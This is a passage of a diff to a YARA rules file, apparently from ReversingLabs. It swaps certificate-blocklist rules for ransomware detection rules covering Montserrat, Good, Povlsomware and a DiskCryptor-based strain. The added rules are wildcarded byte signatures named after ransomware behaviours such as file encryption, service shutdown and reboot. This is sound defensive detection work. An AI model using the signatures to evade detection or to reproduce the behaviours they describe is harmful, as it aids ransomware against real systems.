+            ?? ?? ?? ?? 8A 01 41 88 02 42 84 C0 75 ?? 6A ?? 59 BE ?? ?? ?? ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? F3 A5 68 ?? ?? ?? ??
+            33 F6 8D 84 24 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 89 B4 24 ?? ?? ?? ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 56 6A ?? 8D 4C 24 ?? C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7C 24 ?? ?? 8D 44 24 ?? 56 0F 43 44 24 ?? 56 6A ?? 56 56 68 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D3 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 33 DB C7 44
+        }
+		$encrypt_files_using_diskcryptor_p2 = {
+            24 ?? ?? ?? ?? ?? 50 89 5C 24 ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ??
+            ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B D0 59 59 85 D2
+            75 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 59 8B D0 8D BC 24 ?? ?? ?? ?? 83 EF ?? 66
+            8B 47 ?? 8D 7F ?? 66 3B C3 75 ?? A1 ?? ?? ?? ?? 83 C2 ?? 89 07 8B F2 66 8B 02 83 C2
+            ?? 66 3B C3 75 ?? 8D BC 24 ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3
+            75 ?? 8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 51 50 83 EC ??
+            8B CC 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 C6 84
+            24 ?? ?? ?? ?? ?? 83 7E ?? ?? 72 ?? 8B 36 83 EC ?? 8B CC 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 8B D6 8B C8
+            E8 ?? ?? ?? ?? 59 59 53 6A ?? 8D 4C 24 ?? 8B F0 E8 ?? ?? ?? ?? 53 6A ?? 8D 4C 24 ??
+            C6 84 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 F6 74 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B F3 EB ?? FF 15 ?? ?? ?? ?? 8B F0 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ??
+            8B C6 EB ?? 53 6A ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$reboot = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 56 8D 45 ?? 50 6A ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB ?? 8D 45 ?? 33 F6 50 68 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 56 56 56 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 56 FF 75 ?? C7 45 ?? ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? FF 15
+            ?? ?? ?? ?? F7 D8 1B C0 F7 D8 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" and 1594857600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( $deploy_components ) and ( $get_shares_info ) and ( $encrypt_discs ) ) or ( ( $extract_diskcryptor_from_resources ) and ( $create_diskcryptor_service ) and ( all of ( $encrypt_files_using_diskcryptor_p* ) ) and ( $reboot ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_8Cff807Edaf368A60E4106906D8Df319 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Montserrat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Montserrat ransomware."
 		author = "ReversingLabs"
-		id = "c964a540-6124-52f0-b17f-692cd4b9b3af"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "deeb5f1a-1329-5964-93e1-8ca6a20fcd89"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4646-L4664"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6fc98519faf218d90bb4e01821e6014e009c0b525cfd3c906a64ef82bc20beda"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Montserrat.yara#L1-L118"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c8782a8cb2b87e76ff1f804ee8affd01405827d0914ea725bb0e9ddace7dde10"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Montserrat"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
+        }
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$encrypt_files_p1 = {
+            8B FF 55 8B EC 83 EC ?? 53 56 57 FF 75 ?? 8D 45 ?? FF 75 ?? FF 75 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 7D ?? 8B F0 6A ?? 59 F3 A5 83 CE ?? 39 75 ?? 75 ?? E8 ?? ?? ?? ?? 83
+            20 ?? 8B 45 ?? 89 30 E8 ?? ?? ?? ?? 8B 00 E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5D ?? 89
+            03 3B C6 75 ?? E8 ?? ?? ?? ?? 83 20 ?? 89 33 E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? EB ??
+            8B 45 ?? 8D 75 ?? 83 65 ?? ?? 33 C9 41 C7 45 ?? ?? ?? ?? ?? 83 EC ?? 89 08 8B 45 ??
+            C1 E8 ?? F7 D0 23 C1 6A ?? 59 89 45 ?? 8B FC 8D 45 ?? 50 FF 75 ?? F3 A5 E8 ?? ?? ??
+            ?? 8B F8 83 C4 ?? 89 7D ?? BA ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 4D ?? 8B C1 23 C2 3B C2
+            75 ?? F6 45 ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 81 E1 ?? ?? ?? ?? 8D 75 ?? 89 4D ?? 6A ??
+            59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 7D ?? 83 FF ?? 75 ?? 8B
+            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 8B F0 56 E8 ?? ?? ?? ?? 59 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 57 8B 04
+            85 ?? ?? ?? ?? 80 64 08 ?? ?? FF 15 ?? ?? ?? ?? 85 F6 0F 85 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? C7 00 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8A 45 ?? 0C ?? EB ?? 83 F8 ?? 8A
+        }
+		$encrypt_files_p2 = {
+            45 ?? 75 ?? 0C ?? 57 FF 33 88 45 ?? E8 ?? ?? ?? ?? 8A 55 ?? 59 59 8B 0B 80 CA ?? 8B
+            C1 88 55 ?? 83 E1 ?? C1 F8 ?? 6B C9 ?? 88 55 ?? 8B 04 85 ?? ?? ?? ?? 88 54 08 ?? 8B
+            0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? F6 45 ?? ?? 8B 04 85 ?? ?? ?? ?? C6 44 08 ?? ??
+            74 ?? FF 33 E8 ?? ?? ?? ?? 8B F0 59 85 F6 75 ?? 8D 45 ?? C6 45 ?? ?? 50 FF 75 ?? 8D
+            75 ?? 83 EC ?? 6A ?? 59 8B FC FF 33 F3 A5 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B F0
+            FF 33 E8 ?? ?? ?? ?? 59 8B C6 E9 ?? ?? ?? ?? 8B 03 8B C8 83 E0 ?? C1 F9 ?? 6B D0 ??
+            8A 45 ?? 8B 0C 8D ?? ?? ?? ?? 88 44 11 ?? 8B 0B 8B C1 C1 F8 ?? 83 E1 ?? 6B D1 ?? 8B
+            0C 85 ?? ?? ?? ?? 8B 45 ?? C1 E8 ?? 32 44 11 ?? 24 ?? 30 44 11 ?? F6 45 ?? ?? 75 ??
+            F6 45 ?? ?? 74 ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 80 4C
+            08 ?? ?? 8B 75 ?? B9 ?? ?? ?? ?? 8B C6 23 C1 3B C1 0F 85 ?? ?? ?? ?? F6 45 ?? ?? 74
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 81 E6 ?? ?? ?? ?? 89 75 ?? 8D 75 ??
+            6A ?? 59 8B FC 50 FF 75 ?? F3 A5 E8 ?? ?? ?? ?? 8B D0 83 C4 ?? 83 FA ?? 75 ?? FF 15
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 0B 8B C1 83 E1 ?? C1 F8 ?? 6B C9 ?? 8B 04 85 ?? ??
+            ?? ?? 80 64 08 ?? ?? FF 33 E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8B 0B 8B C1 C1 F8 ?? 83
+            E1 ?? 6B C9 ?? 8B 04 85 ?? ?? ?? ?? 89 54 08 ?? 33 C0 5F 5E 5B 8B E5 5D C3
+        }
+		$shutdown_services_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F9 8B 75 ?? 8B 1D
+            ?? ?? ?? ?? FF D3 83 7E ?? ?? 89 45 ?? 72 ?? 8B 36 6A ?? 56 FF 37 FF 15 ?? ?? ?? ??
+            8B F0 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? 8B
+            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 ??
+            ?? 83 F8 ?? 75 ?? 66 90 FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A
+            ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? FF D3 2B 45 ?? 3B
+            47 ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 8B CF E8
+            ?? ?? ?? ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84
+        }
+		$shutdown_services_p2 = {
+            FF 77 ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF D3 2B 45 ?? 3B 47 ?? 0F 87
+            ?? ?? ?? ?? 83 7D ?? ?? 75 ?? E9 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8
+            ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and ( pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" or pe.signatures [ i ] . serial == "8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" ) and 1598334455 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $shutdown_services_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_A3E62Be1572293Ad618F58A8Aa32857F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Good : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Good ransomware."
 		author = "ReversingLabs"
-		id = "2f67abf3-390a-5c67-afed-e586e20692af"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e0f97200-7fe9-5811-b6cd-708ecc3a2fbc"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4666-L4684"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f849898465bc651f19f6f1b54315c061466d8c5860ecf1a07f54c8c8292f6a95"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Good.yara#L1-L82"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6737853a77a6008f9fd2141bb6b13d595f1cb7e832be944596f709e1fcdf8003"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Good"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D
+            85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E
+            5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85 C0 75 ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8D 85 ?? ?? ?? ?? 50 FF D7 53 85
+            C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 8B 3D ?? ?? ??
+            ?? 33 C0 66 89 45 ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ??
+            ?? ?? ?? ?? FF D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B D8 83 FB ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 53 8B 5D ?? 57 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 0F 8B
+            C1 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4F ?? 83 C4 ?? 8B C1 83 E8 ?? 74 ?? 83
+            E8 ?? 74 ?? 83 E8 ?? 74 ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ??
+            ?? ?? EB ?? 68 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? 83 F8 ?? 77 ?? FF 24 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 C4 ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ??
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 47 ?? 83 C4 ?? A8 ?? 74 ?? 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7F ?? ?? 75 ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 FF
+            77 ?? FF 15 ?? ?? ?? ?? 8D 04 45 ?? ?? ?? ?? 50 FF 77 ?? 56 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 45 ?? 50 6A ?? 56 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 5E FF 77 ?? 53 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 77 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5B
+            5D C3
+        }
+		$encrypt_files = {
+            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B C8 8B F2 83 C4 ?? 2B CE 8D 71 ??
+            66 90 0F B7 0A 8D 52 ?? 66 89 4C 32 ?? 66 85 C9 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 8B 35 ?? ?? ?? ?? 47 89 7D ?? E9 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? FF 75 ?? 50 E8 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? EB ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
+            8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? EB ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 53
+            FF D6 8B 3D ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ??
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5 5D C3 53
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 5F 5E 5B 8B E5
+            5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ISIDA, TOV" and ( pe.signatures [ i ] . serial == "00:a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" or pe.signatures [ i ] . serial == "a3:e6:2b:e1:57:22:93:ad:61:8f:58:a8:aa:32:85:7f" ) and 1596585600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_672D4428450Afcc24Fc60969A5063A3E : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Povlsomware : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Povlsomware ransomware."
 		author = "ReversingLabs"
-		id = "fcd8e808-dbd6-5903-868a-0aa4541e6321"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "317d7cca-4fe8-55ab-8f5f-e42be727ec26"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4686-L4702"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8f5927e96109184bad7de4513994fd1021fe1cc5977e60fa72d808df95cb4516"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara#L1-L64"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "465dc1b1d7e9eb3091f36efb51029cd3383d05ece054e814b18f379e58c7e457"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Povlsomware"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_attack = {
+            7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ??
